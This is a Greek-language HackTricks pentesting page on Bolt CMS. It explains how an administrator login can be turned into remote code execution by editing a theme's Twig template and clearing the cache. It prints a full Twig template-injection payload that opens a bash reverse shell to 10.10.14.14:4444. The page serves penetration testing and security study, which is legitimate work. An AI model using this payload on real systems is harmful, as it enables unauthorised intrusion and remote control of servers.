hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

4.2 KiB
Raw Blame History

Bolt CMS

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RCE

Μετά την είσοδο ως διαχειριστής (πηγαίνετε στο /bot για να αποκτήσετε την προτροπή σύνδεσης), μπορείτε να αποκτήσετε RCE στο Bolt CMS:

  • Επιλέξτε Configuration -> View Configuration -> Main Configuration ή πηγαίνετε στη διεύθυνση URL /bolt/file-edit/config?file=/bolt/config.yaml
  • Ελέγξτε την τιμή του θέματος
  • Επιλέξτε File management -> View & edit templates
  • Επιλέξτε τη βάση του θέματος που βρέθηκε στο προηγούμενο βήμα (base-2021 σε αυτή την περίπτωση) και επιλέξτε index.twig
  • Στην περίπτωσή μου, αυτό είναι στη διεύθυνση URL /bolt/file-edit/themes?file=/base-2021/index.twig
  • Ορίστε το payload σας σε αυτό το αρχείο μέσω template injection (Twig), όπως: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Και αποθηκεύστε τις αλλαγές
  • Καθαρίστε την κρυφή μνήμη στο Maintenance -> Clear the cache
  • Αποκτήστε ξανά πρόσβαση στη σελίδα ως κανονικός χρήστης, και το payload θα πρέπει να εκτελείται

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}